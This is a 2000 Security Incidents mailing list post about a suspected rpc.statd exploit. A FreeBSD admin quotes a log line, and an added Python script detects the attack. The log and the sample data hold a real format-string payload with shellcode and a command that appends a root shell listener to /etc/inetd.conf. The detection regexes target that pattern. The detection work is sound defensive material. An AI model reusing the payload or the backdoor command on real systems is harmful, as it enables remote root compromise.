Security Incidents mailing list archives
rpc.statd exploit?
From: Dave <dave () PARKERWHITE COM>
Date: Tue, 15 Aug 2000 10:16:39 -0700
Hello all,

While looking through the log files, I came across a few peculiar lines that appear to be an attempt to overflow the rpc.statd and insert a root shell into /etc/inetd.conf on port 9704. Later, I noticed that the NIC went into promisc. mode and dropped out of it twice. Is anyone familiar with this exploit? What should I be looking for to tell if it was successful? The system is FreeBSD 4.1-stable. FreeBSD's website revealed no information regarding exploits on rpc.statd. Any information is appreciated.

Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon: ^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF><BF>^E<F7><FF><BF>^F<F7><FF><BF> ^F<F7><FF><BF>^G<F7><FF><BF>^G<F7><FF><BF>%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x %n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^P<EB>K^M- v<AC>M-^C<EE> M-^M^(M-^C<C6> M- ^<B0>M-^C <EE> M-^M^.M-^C<C6> M-^C<C3> M-^C<EB>#M- ^<B4>1<C0>M-^C<EE> M-^HF'M-^HF*M-^C<C6> M-^HF<AB>M- F<B8><B0>+, M- <F3>M-^MN <AC>M-^MV<B8><CD>M-^@1<DB>M- <D8>@<CD>M-^@<E8><B0><FF><FF><FF>/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/i netd.conf;killall -HUP inetd

Dave Byrne
Systems Administrator
AtomicMinds
(858) 350-0012
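The log line above carries the two tell-tale markers of a format-string attack on rpc.statd: `%n` conversions (the write primitive) followed by a shell command that appends a root `/bin/sh` entry to /etc/inetd.conf. The following Python is an added example, not code from the original post or from FreeBSD: it scans syslog text for rpc.statd lines showing those markers and checks an inetd.conf for the planted entry, so an admin can answer Dave's question of whether the attempt succeeded. The sample log lines and inetd.conf content are constructed for the example.

```python
import re

# Constructed sample syslog excerpt, modelled on the line quoted in the post (not real data).
SAMPLE_LOG = """\
Aug 12 02:58:01 host rpc.statd: statd running
Aug 12 02:59:14 host rpc.statd: Invalid hostname to sm_mon: %08x %08x %0242x%n%055x%n/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Aug 12 03:10:00 host rpc.statd: Invalid hostname to sm_mon: not-a-real-host
"""

# Constructed sample /etc/inetd.conf with the backdoor line appended.
SAMPLE_INETD_CONF = """\
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""

FORMAT_WRITE = re.compile(r"%\d*n")               # %n (optionally with a width) is the write primitive
INETD_INJECT = re.compile(r">>\s*/etc/inetd\.conf")  # payload appends to inetd.conf
# An inetd entry that runs /bin/sh as root is never legitimate.
ROOT_SHELL_ENTRY = re.compile(r"^\s*(\d+)\s+stream\s+tcp\s+nowait\s+root\s+/bin/sh\b")


def scan_statd_log(text):
    """Return [(line_no, [reasons])] for rpc.statd sm_mon lines that look like the attack."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if "rpc.statd" not in line or "Invalid hostname to sm_mon" not in line:
            continue
        reasons = []
        if FORMAT_WRITE.search(line):
            reasons.append("format-string %n")
        if INETD_INJECT.search(line):
            reasons.append("inetd.conf append")
        if reasons:
            hits.append((n, reasons))
    return hits


def find_rogue_inetd_shells(inetd_conf):
    """Return the ports of inetd.conf entries that hand out a root /bin/sh (the planted backdoor)."""
    return [int(m.group(1))
            for m in (ROOT_SHELL_ENTRY.match(l) for l in inetd_conf.splitlines()) if m]


if __name__ == "__main__":
    for line_no, reasons in scan_statd_log(SAMPLE_LOG):
        print("log line %d: %s" % (line_no, ", ".join(reasons)))
    for port in find_rogue_inetd_shells(SAMPLE_INETD_CONF):
        print("inetd.conf spawns a root shell on port %d" % port)
```

A root-shell entry in inetd.conf, or a listener on that port, means the `%n` write landed and the host must be treated as compromised; the promiscuous-mode transitions the post mentions are consistent with a sniffer being started afterwards and deserve the same treatment.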